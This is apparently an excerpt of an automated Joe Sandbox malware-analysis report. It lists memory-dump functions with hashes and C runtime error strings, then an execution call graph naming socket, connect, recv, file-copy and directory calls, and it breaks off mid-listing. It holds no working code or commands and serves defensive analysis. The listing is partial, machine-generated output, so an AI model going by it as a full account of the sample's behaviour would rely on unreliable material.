                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Byte$CharMultiWide$Lead_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2766522060-0
                                                                                                                                                  • Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                                                                                                                                                  • Instruction ID: ae98669a58edcd988164d7371f99cd5e312a66dfa5fadf508caeb8d7cda6edc4
                                                                                                                                                  • Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                                                                                                                                                  • Instruction Fuzzy Hash: 6E31D573A3C2C58AF7705F21D440B69E690AB89FA9F844135DA8C437C5CB7CE4458760
                                                                                                                                                  Function 00007FF77572AC27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: signal
                                                                                                                                                  • String ID: CCG
                                                                                                                                                  • API String ID: 1946981877-1584390748
                                                                                                                                                  • Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                                                                                                                                                  • Instruction ID: f48b6fe23f580bfc2e1a01c0d024f70e67cf3f4e7c00bce58b7427a3bdde2eb0
                                                                                                                                                  • Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                                                                                                                                                  • Instruction Fuzzy Hash: 61218B23E3D55287FE787314844137892A1DF4CF31FA98936C90E823E6DE9CA8C552A1
                                                                                                                                                  Function 00007FF77572A6D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-3474627141
                                                                                                                                                  • Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                                                                                                                                  • Instruction ID: 990a24ab845863bc8f78dff7be9a9ddd3a989a139d2594c5f8fe17280ea376b6
                                                                                                                                                  • Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                                                                                                                                  • Instruction Fuzzy Hash: 50117363818EC482D6119F1CE0413EAB370FF9E759F515326EBC816624DF39D1528740
                                                                                                                                                  Function 00007FF77572A707 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2713391170
                                                                                                                                                  • Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                                                                                                                                  • Instruction ID: 5786aa947d8f2ac02bfbd52b8ce890290e26d63df6a8d11b14e8eb5fdc798935
                                                                                                                                                  • Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                                                                                                                                  • Instruction Fuzzy Hash: A0F01D67828F8482D2119F18E4002ABB370FF9EB99F615326EBC926664DF3DD5468750
                                                                                                                                                  Function 00007FF77572A710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4064033741
                                                                                                                                                  • Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                                                                                                                                  • Instruction ID: 3767dc32db609e354cea5fbd7401e4a6dddbc083bf2096975ada48ac7bc0c30a
                                                                                                                                                  • Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                                                                                                                                  • Instruction Fuzzy Hash: 92F01D67828F8482D2119F18E4002ABB370FF9EB99F615326EBC92A624DF3DD5428750
                                                                                                                                                  Function 00007FF77572A719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4283191376
                                                                                                                                                  • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                                                                                                                                  • Instruction ID: bb807f699c65c2c6ec0e1fb34995d23f89f8c70e016855d0de163698ca7b4c78
                                                                                                                                                  • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                                                                                                                                  • Instruction Fuzzy Hash: 82F01D67828F8482D2119F18E4006ABB370FF9EB99F615326EBC926624DF3DD5428750
                                                                                                                                                  Function 00007FF77572A722 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4273532761
                                                                                                                                                  • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                                                                                                                                  • Instruction ID: fcfabef0832a21fea39cc7cba06a8b4b4705278e56edb2a1ae453d785334a49b
                                                                                                                                                  • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                                                                                                                                  • Instruction Fuzzy Hash: C8F01D67828F8482D2119F18E4006ABB370FF9EB99F615326EBC926664DF3DD5428750
                                                                                                                                                  Function 00007FF77572A72B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2187435201
                                                                                                                                                  • Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                                                                                                                                  • Instruction ID: 083c6f7f693b2c92a7f309027c8ac42e96b6d665bdb8904da7c874df465d9357
                                                                                                                                                  • Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                                                                                                                                  • Instruction Fuzzy Hash: 5BF01D67828F8482D2119F18E4406ABB370FF9EB99F615326EBC926624DF3DD5428750
                                                                                                                                                  Function 00007FF77572A734 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2468659920
                                                                                                                                                  • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                                                                                                                                  • Instruction ID: dc1d5e0b55c30f8e1c037d66bfc6e554932b3ae9ad0cafa636961c66b32f41a3
                                                                                                                                                  • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                                                                                                                                  • Instruction Fuzzy Hash: E2F01D67828FC482D2119F18E4002ABB370FF9E799F605326EFC826624DF2DD5428740

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00007FF76A3712FD Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2510911859.00007FF76A371000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF76A370000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2510842906.00007FF76A370000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.2510930956.00007FF76A380000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.2510930956.00007FF76A97C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.2511540643.00007FF76AD95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.2511558001.00007FF76AD9D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.2511558001.00007FF76AD9F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.2511586995.00007FF76ADA0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.2511601490.00007FF76ADA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff76a370000_shdpeqdz2a54sj46ur0.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                                                                                                                                                  • Instruction ID: ee581a889b3e6210b16c4758912f925931202506863737649525a0b0ba7d6d92
                                                                                                                                                  • Opcode Fuzzy Hash: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                                                                                                                                                  • Instruction Fuzzy Hash: 6DB09232A08641C4F2003F0298412586620AB09700F820071C40C07366CA6C94414730

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:6.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:3.2%
                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                  Total number of Limit Nodes:35
                                                                                                                                                  execution_graph 58797 7ff8bfb83afd 58804 7ff8bfb83b0a 58797->58804 58798 7ff8bfb83d1a 58799 7ff8bfb83b2b Sleep 58799->58804 58801 7ff8bfb83ba7 Sleep 58801->58804 58802 7ff8bfb81292 19 API calls 58802->58804 58804->58798 58804->58799 58804->58801 58804->58802 58805 7ff8bfb83a94 21 API calls 58804->58805 58806 7ff8bfb89c52 26 API calls 58804->58806 58805->58804 58806->58804 58807 7ff8ba4f184a 58815 7ff8ba4f1855 58807->58815 58808 7ff8ba4f195e 58809 7ff8ba4f196b 58808->58809 58874 7ff8ba4f22d5 10 API calls 58808->58874 58811 7ff8ba4f187d Sleep 58811->58815 58813 7ff8ba4f22d5 10 API calls 58813->58815 58815->58808 58815->58811 58815->58813 58816 7ff8ba4f1932 Sleep 58815->58816 58818 7ff8ba4f191e memcpy 58815->58818 58819 7ff8ba4f256c socket 58815->58819 58854 7ff8ba4f2a1a 58815->58854 58865 7ff8ba4f1780 58815->58865 58816->58815 58818->58815 58820 7ff8ba4f25a3 58819->58820 58821 7ff8ba4f276b WSAGetLastError 58819->58821 58822 7ff8ba4f25a7 58820->58822 58823 7ff8ba4f25c5 58820->58823 58824 7ff8ba4f1292 6 API calls 58821->58824 58875 7ff8ba4f2209 58822->58875 58825 7ff8ba4f2209 8 API calls 58823->58825 58827 7ff8ba4f278f 58824->58827 58830 7ff8ba4f25c3 58825->58830 58828 7ff8ba4f25df 58827->58828 58829 7ff8ba4f2799 58827->58829 58834 7ff8ba4f1292 6 API calls 58828->58834 58892 7ff8ba4f1292 58829->58892 58833 7ff8ba4f25d7 58830->58833 58888 7ff8ba4f233a setsockopt 58830->58888 58903 7ff8ba4f22d5 10 API calls 58833->58903 58836 7ff8ba4f2600 58834->58836 58835 7ff8ba4f261e 58835->58833 58839 7ff8ba4f2623 htonl htons connect 58835->58839 58836->58815 58841 7ff8ba4f2661 58839->58841 58842 7ff8ba4f267c WSAGetLastError 58839->58842 58845 7ff8ba4f2209 8 API calls 58841->58845 58843 7ff8ba4f273e WSAGetLastError 58842->58843 58844 7ff8ba4f268d 58842->58844 58847 7ff8ba4f1292 6 API calls 58843->58847 58844->58833 58846 7ff8ba4f2695 select 58844->58846 58848 7ff8ba4f266e 58845->58848 58849 7ff8ba4f26f6 58846->58849 58850 7ff8ba4f2720 58846->58850 58847->58833 58848->58827 58848->58833 58849->58841 58851 7ff8ba4f26fc WSAGetLastError 58849->58851 58852 7ff8ba4f1292 6 API calls 58850->58852 58853 7ff8ba4f1292 6 API calls 58851->58853 58852->58833 58853->58833 58855 7ff8ba4f2a34 58854->58855 58856 7ff8ba4f2aa8 58854->58856 58855->58856 58857 7ff8ba4f2a39 recv 58855->58857 58858 7ff8ba4f1292 6 API calls 58856->58858 58860 7ff8ba4f2a4f 58857->58860 58861 7ff8ba4f2a5c WSAGetLastError 58857->58861 58859 7ff8ba4f2a53 58858->58859 58859->58815 58860->58859 58864 7ff8ba4f1292 6 API calls 58860->58864 58861->58859 58862 7ff8ba4f2a70 58861->58862 58863 7ff8ba4f1292 6 API calls 58862->58863 58863->58859 58864->58859 58866 7ff8ba4f1842 58865->58866 58867 7ff8ba4f1798 58865->58867 58866->58815 58867->58866 58912 7ff8ba4f9540 58867->58912 58870 7ff8ba4f1834 LeaveCriticalSection 58870->58866 58871 7ff8ba4f17c8 58871->58870 58872 7ff8ba4f1292 6 API calls 58871->58872 58915 7ff8ba4fa8a0 58871->58915 58872->58871 58874->58809 58876 7ff8ba4f2219 ioctlsocket 58875->58876 58878 7ff8ba4f223c 58876->58878 58879 7ff8ba4f224d WSAGetLastError 58876->58879 58878->58835 58881 7ff8ba4f2154 setsockopt 58878->58881 58880 7ff8ba4f1292 6 API calls 58879->58880 58880->58878 58882 7ff8ba4f21e4 WSAGetLastError 58881->58882 58883 7ff8ba4f2189 setsockopt 58881->58883 58886 7ff8ba4f1292 6 API calls 58882->58886 58884 7ff8ba4f21b5 58883->58884 58885 7ff8ba4f21bf WSAGetLastError 58883->58885 58884->58830 58887 7ff8ba4f1292 6 API calls 58885->58887 58886->58884 58887->58884 58889 7ff8ba4f2377 58888->58889 58890 7ff8ba4f2381 WSAGetLastError 58888->58890 58889->58835 58891 7ff8ba4f1292 6 API calls 58890->58891 58891->58889 58893 7ff8ba4f12a0 58892->58893 58904 7ff8ba4fd670 58893->58904 58896 7ff8ba4f1327 fwrite fflush 58898 7ff8ba4f1350 58896->58898 58897 7ff8ba4f135c EnterCriticalSection 58899 7ff8ba4f1376 LeaveCriticalSection 58897->58899 58900 7ff8ba4f1393 58897->58900 58898->58836 58899->58896 58901 7ff8ba4f13cd CopyFileA 58900->58901 58902 7ff8ba4f1405 58901->58902 58902->58899 58903->58828 58905 7ff8ba4fd695 58904->58905 58906 7ff8ba4fd67e 58904->58906 58911 7ff8ba4fe6ab fputc 58905->58911 58910 7ff8ba4fe6ab fputc 58906->58910 58909 7ff8ba4f12f9 58909->58896 58909->58897 58909->58898 58910->58909 58911->58909 58913 7ff8ba4f9556 GetSystemTimeAsFileTime 58912->58913 58914 7ff8ba4f17ab EnterCriticalSection 58912->58914 58913->58914 58914->58871 58916 7ff8ba4fa8cc 58915->58916 58919 7ff8ba4fa8eb 58915->58919 58917 7ff8ba4fa8d6 58916->58917 58918 7ff8ba4fa909 58916->58918 58921 7ff8ba4fa8f4 58917->58921 58922 7ff8ba4fa8d8 58917->58922 58934 7ff8ba4fa50f 23 API calls 58918->58934 58919->58871 58921->58919 58929 7ff8ba4fa2a2 58921->58929 58923 7ff8ba4fa902 58922->58923 58924 7ff8ba4fa8df 58922->58924 58933 7ff8ba4fa2b0 25 API calls 58923->58933 58924->58919 58932 7ff8ba4fa639 45 API calls 58924->58932 58927 7ff8ba4fa907 58927->58919 58935 7ff8ba4fa060 58929->58935 58932->58919 58933->58927 58934->58919 58964 7ff8ba4f2eab 58935->58964 58942 7ff8ba4fa0f2 strlen 58943 7ff8ba4fa11f strlen 58942->58943 58944 7ff8ba4fa109 58942->58944 58984 7ff8ba4f66c9 58943->58984 58944->58943 58945 7ff8ba4fa10e strlen 58944->58945 58945->58943 58948 7ff8ba4fa151 58951 7ff8ba4fa159 strlen 58948->58951 58960 7ff8ba4fa087 58948->58960 58949 7ff8ba4fa26b 59040 7ff8ba4f3ff8 FindClose 58949->59040 58954 7ff8ba4fa186 strcpy strlen strlen strlen 58951->58954 58955 7ff8ba4fa170 58951->58955 58961 7ff8ba4fa1e9 58954->58961 58955->58954 58957 7ff8ba4fa175 strlen 58955->58957 58956 7ff8ba4fa277 58958 7ff8ba4f2eab 2 API calls 58956->58958 58956->58960 58957->58954 58958->58960 58960->58919 58961->58949 58961->58960 59012 7ff8ba4f4013 58961->59012 59037 7ff8ba4fafb7 38 API calls 58961->59037 59038 7ff8ba4fa9e0 21 API calls 58961->59038 59039 7ff8ba4fab69 66 API calls 58961->59039 58965 7ff8ba4f2eb6 58964->58965 58966 7ff8ba4f2ec1 QueryPerformanceFrequency QueryPerformanceCounter 58964->58966 58965->58960 58967 7ff8ba4f9cc0 GetModuleHandleExA 58965->58967 58966->58965 58968 7ff8ba4f9cf2 GetLastError 58967->58968 58969 7ff8ba4f9ce8 58967->58969 58970 7ff8ba4f1292 6 API calls 58968->58970 58971 7ff8ba4f6dd1 58969->58971 58970->58969 58972 7ff8ba4f6de2 58971->58972 58973 7ff8ba4f6e18 58971->58973 58974 7ff8ba4f6de7 58972->58974 58975 7ff8ba4f6e48 58972->58975 58976 7ff8ba4f1292 6 API calls 58973->58976 58977 7ff8ba4f6df0 58974->58977 58978 7ff8ba4f6e78 58974->58978 58979 7ff8ba4f1292 6 API calls 58975->58979 58982 7ff8ba4f6dfd 58976->58982 59041 7ff8ba4f6c92 8 API calls 58977->59041 58980 7ff8ba4f1292 6 API calls 58978->58980 58979->58982 58980->58982 58982->58942 58982->58961 58983 7ff8ba4f6df5 58983->58982 58985 7ff8ba4f66e7 58984->58985 58986 7ff8ba4f66d2 GetFileAttributesA 58984->58986 58988 7ff8ba4f1292 6 API calls 58985->58988 58987 7ff8ba4f6717 GetLastError 58986->58987 58989 7ff8ba4f66dd 58986->58989 58987->58989 58988->58989 58989->58948 58990 7ff8ba4f42be 58989->58990 58991 7ff8ba4f42dd strlen 58990->58991 58992 7ff8ba4f4318 58990->58992 58994 7ff8ba4f42ee 58991->58994 59006 7ff8ba4f4309 58991->59006 58993 7ff8ba4f1292 6 API calls 58992->58993 58993->59006 58995 7ff8ba4f4396 strcpy strlen 58994->58995 58996 7ff8ba4f42f7 CreateDirectoryA 58994->58996 58998 7ff8ba4f43ce strlen 58995->58998 59004 7ff8ba4f4375 58995->59004 58997 7ff8ba4f4350 GetLastError 58996->58997 58996->59006 58999 7ff8ba4f1292 6 API calls 58997->58999 58998->59004 58999->59004 59000 7ff8ba4f4580 59003 